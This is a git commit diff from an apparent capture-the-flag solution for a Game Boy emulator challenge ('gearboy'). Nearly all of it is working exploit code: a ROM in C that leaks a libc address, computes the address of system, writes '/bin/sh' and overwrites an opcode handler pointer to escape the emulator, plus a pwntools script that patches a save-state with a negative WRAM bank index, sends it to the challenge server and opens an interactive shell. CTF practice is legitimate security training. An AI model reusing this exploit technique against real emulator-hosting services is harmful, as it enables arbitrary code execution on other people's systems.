commit a1f7b8843f887d2d698477d6d8544e545a517725
parent 3464878abafda13241f2eaed3db8bfd696ee4b67
Author: Louis Burda <quent.burda@gmail.com>
Date: Thu, 26 May 2022 19:06:59 +0200
Working local using unstable offsets
Diffstat:
M | main.c | | | 26 | +++++++++++++++----------- |
M | solve.py | | | 40 | +++++++++------------------------------- |
2 files changed, 24 insertions(+), 42 deletions(-)
diff --git a/main.c b/main.c
@@ -5,29 +5,33 @@ void
main(void)
{
volatile static uint8_t *processor;
+ volatile static uint8_t *memory;
volatile static uint64_t op0x00;
volatile static uint64_t base;
- volatile static uint64_t load_rom;
+ volatile static uint64_t libc;
+ volatile static uint64_t leak;
+ volatile static uint64_t target;
+
+ /* NEEDS TO BE FIRST SESSION OF CONTAINER! */
/* processor - wrambanks = -0x126a0 */
/* WRAM BANK = -0x13 */
processor = (void*) 0xD960;
+ memory = processor - 0xd0;
- /* leak opcode 0x00 to get base */
- op0x00 = *(uint64_t*)processor;
- base = op0x00 - 0x1d420;
- load_rom = base + 0x34ad0;
-
- /* set opcode 0x10 to load_rom */
- *(uint64_t*)(processor+0x10*0x10) = load_rom;
+ /* leak libc from addr */
+ leak = *(uint64_t*)(memory + 0x30);
+ libc = leak + 0x125cff0;
+ target = libc + 0x52290; /* system */
- /* write /bin/sh to processor pointer (opcode 0x00) */
- strcpy(processor, "/home/ctf/wrapper.py");
+ /* set opcode 0x00 (nop) to gadget */
+ strcpy(processor, "/bin/sh");
+ *(uint64_t*)(processor+0x10*0x10) = target;
+ // *(uint64_t*)(processor+0x10*0x10) = 0;
__asm \
stop \
- halt \
__endasm;
while (1);
diff --git a/solve.py b/solve.py
@@ -6,37 +6,15 @@ from pwn import *
context.log_level = "error"
-def send(rom, state):
- #io = process("ncat --ssl 8c83260abb62e95abcc3fdf7-gearboy.challenge.master.cscg.live 31337".split())
- io = process("ncat localhost 1024".split())
- io.sendline(b64encode(open(rom, "rb").read()))
- io.sendline(b64encode(open(state, "rb").read()))
- data = io.readuntil(b"Got EOF")
- io.close()
- return data
+rom = list(open("main.gb", "rb").read())
+state = list(open("main.state", "rb").read())
-def set_wrambanks(filename, index):
- data = open(filename, "rb").read()
- data = data[:0x1000] + struct.pack("<i", index) + data[0x1004:]
- with open(filename, "wb+") as f:
- f.write(data)
+for i,v in enumerate(struct.pack("<i", -0x13)):
+ state[0x10000+i] = v
-def find_heap_start():
- search_space = (-256, -90)
- while search_space[0] + 1 != search_space[1]:
- testval = (search_space[1] + search_space[0]) // 2
- print(search_space)
+io = process("ncat --ssl 61a837693e76115bbb874401-gearboy.challenge.master.cscg.live 31337".split())
+#io = process("ncat localhost 1024".split())
+io.sendline(b64encode(bytes(rom)))
+io.sendline(b64encode(bytes(state)))
- set_modstate(testval)
-
- data = send("main.gb", "main.state")
- if b"exit code 139" in data:
- search_space = (testval, search_space[1])
- else:
- search_space = (search_space[0], testval)
-
- print("OFFSET", testval)
-
-set_wrambanks("main.gb", -0x37)
-
-print(send("main.gb", "main.state").decode())
+io.interactive()